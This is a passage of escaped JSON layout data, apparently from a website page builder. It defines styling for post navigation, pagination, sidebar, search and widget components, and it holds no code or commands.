0.5)\",\"style\":\"solid\"}},\"transform\":{\"translate\":{\"x\":{\"path\":\"value\"},\"x_value\":\"4\",\"y\":{\"path\":\"value\"},\"y_value\":\"6\"}},\"zIndex\":-1}}},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\",\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false}},{\"id\":149,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"25-m22\",\"nodes\":[\"25-m12\",\"639-m12\"],\"v\":\"1.1\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"}},\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}}}},{\"id\":150,\"type\":\"hop-column\",\"nodeId\":\"25-m22\",\"nodes\":[\"25-m13\",\"639-m13\"],\"v\":\"1.1\"},{\"id\":151,\"type\":\"hop-column\",\"nodeId\":\"25-m23\",\"nodes\":[\"25-m14\",\"639-m14\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":152,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"1725-m29\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"25-m15\",\"639-m15\"]},{\"id\":153,\"type\":\"hop-column\",\"nodeId\":\"25-m41\",\"nodes\":[\"25-m16\",\"639-m16\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":154,\"type\":\"hop-archive-pagination\",\"nodeId\":\"26-m14\",\"style\":{\"descendants\":{\"paginationNumbers\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"paginationActiveNumber\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}},\"v\":\"1.1\",\"nodes\":[\"25-m17\",\"639-m17\"]},{\"id\":155,\"type\":\"hop-column\",\"nodeId\":\"25-m24\",\"nodes\":[\"25-m18\",\"639-m18\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"15\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":156,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"1725-m27\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"25-m19\",\"639-m19\"]},{\"id\":157,\"type\":\"hop-row\",\"nodeId\":\"38-m2\",\"props\":{\"layout\":{\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":1,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"v\":\"1.1\",\"nodes\":[\"25-m20\",\"639-m20\"]},{\"id\":158,\"type\":\"hop-column\",\"nodeId\":\"38-m3\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"nodes\":[\"25-m21\",\"639-m21\"],\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":159,\"type\":\"hop-archive-navigation\",\"nodeId\":\"38-m9\",\"v\":\"1.1\",\"nodes\":[\"25-m22\",\"639-m22\"]},{\"id\":160,\"type\":\"hop-sidebar\",\"nodeId\":\"4455-s1\",\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}},\"v\":\"1.1\",\"nodes\":[\"438-s1\"]},{\"id\":161,\"type\":\"hop-section\",\"nodeId\":\"28-s9\",\"nodes\":[\"438-s2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\"}}}}},\"v\":\"1.1\"},{\"id\":162,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"28-s13\",\"nodes\":[\"438-s13\"],\"v\":\"1.1\"},{\"id\":163,\"type\":\"hop-column\",\"nodeId\":\"28-s14\",\"nodes\":[\"438-s14\"],\"v\":\"1.1\"},{\"id\":164,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"28-s15\",\"nodes\":[\"438-s15\"],\"v\":\"1.1\"},{\"id\":165,\"type\":\"hop-text\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s16\"],\"v\":\"1.1\"},{\"id\":166,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"nodeId\":\"28-s10\",\"nodes\":[\"438-s3\"],\"v\":\"1.1\"},{\"id\":167,\"type\":\"hop-column\",\"nodeId\":\"28-s12\",\"nodes\":[\"438-s4\"],\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":168,\"type\":\"hop-widget-area\",\"nodeId\":\"1719-s2\",\"style\":{\"descendants\":{\"widgetBox\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"widgetListItemLink\":{\"typography\":{\"color\":\"${theme.colors.4|variant3}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"widgetListItem\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"padding\":{\"top\":{\"value\":\"4\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"4\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"widgetTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"widgetList\":{\"listStyleType\":\"none\"},\"widgetInput\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"focus\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}}}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}}},\"v\":\"1.1\",\"nodes\":[\"438-s5\"]},{\"id\":169,\"type\":\"hop-search-widget\",\"nodeId\":\"1719-s3\",\"style\":{\"descendants\":{\"widget-box\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},\"background\":{\"color\":\"\"}},\"widget-title\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}},\"bottom\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}},\"widget-input\":{\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}},\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"widget-button\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"typography\":{\"color\":\"${theme.colors.5}\"},\"display\":\"inline-block\",\"background\":{\"color\":\"rgb(249, 250, 251)\"}},\"widget-button-icon\":{\"display\":\"inline-block\"},\"widget-button-text\":{\"display\":\"none\"},\"widget-input-placeholder\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"v\":\"1.1\",\"nodes\":[\"438-s6\"],\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}}},{\"id\":170,\"type\":\"hop-recent-post-widget\",\"nodeId\":\"1719-s4\",\"v\":\"1.1\",\"nodes\":[\"438-s7\"]},{\"id\":171,\"type\":\"hop-recent-comments-widget\",\"nodeId\":\"1719-s5\",\"v\":\"1.1\",\"nodes\":[\"438-s8\"]},{\"id\":172,\"type\":\"hop-archives-widget\",\"nodeId\":\"1719-s6\",\"v\":\"1.1\",\"props\":{\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false},\"nodes\":[\"438-s9\"]},{\"id\":173,\"type\":\"hop-categories-widget\",\"nodeId\":\"1719-s7\",\"v\":\"1.1\",\"nodes\":[\"438-s10\"]},{\"id\":174,\"type\":\"hop-meta-widget\",\"nodeId\":\"1719-s8\",\"v\":\"1.1\",\"nodes\":[\"438-s11\"]},{\"id\":175,\"type\":\"hop-text-widget\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s12\"],\"v\":\"1.1\"},{\"id\":176,\"type\":\"hop-sidebar\",\"nodeId\":\"4455-s1\",\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}},\"v\":\"1.1\",\"nodes\":[\"438-s1\"]},{\"id\":177,\"type\":\"hop-section\",\"nodeId\":\"28-s9\",\"nodes\":[\"438-s2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\"}}}}},\"v\":\"1.1\"},{\"id\":178,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"28-s13\",\"nodes\":[\"438-s13\"],\"v\":\"1.1\"},{\"id\":179,\"type\":\"hop-column\",\"nodeId\":\"28-s14\",\"nodes\":[\"438-s14\"],\"v\":\"1.1\"},{\"id\":180,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"28-s15\",\"nodes\":[\"438-s15\"],\"v\":\"1.1\"},{\"id\":181,\"type\":\"hop-text\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s16\"],\"v\":\"1.1\"},{\"id\":182,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"nodeId\":\"28-s10\",\"nodes\":[\"438-s3\"],\"v\":\"1.1\"},{\"id\":183,\"type\":\"hop-column\",\"nodeId\":\"28-s12\",\"nodes\":[\"438-s4\"],\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":184,\"type\":\"hop-widget-area\",\"nodeId\":\"1719-s2\",\"style\":{\"descendants\":{\"widgetBox\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"widgetListItemLink\":{\"typography\":{\"color\":\"${theme.colors.4|variant3}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"widgetListItem\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"padding\":{\"top\":{\"value\":\"4\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"4\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"widgetTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"widgetList\":{\"listStyleType\":\"none\"},\"widgetInput\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"focus\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}}}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}}},\"v\":\"1.1\",\"nodes\":[\"438-s5\"]},{\"id\":185,\"type\":\"hop-search-widget\",\"nodeId\":\"1719-s3\",\"style\":{\"descendants\":{\"widget-box\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},\"background\":{\"color\":\"\"}},\"widget-title\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}},\"bottom\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}},\"widget-input\":{\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}},\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"widget-button\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"typography\":{\"color\":\"${theme.colors.5}\"},\"display\":\"inline-block\",\"background\":{\"color\":\"rgb(249, 250, 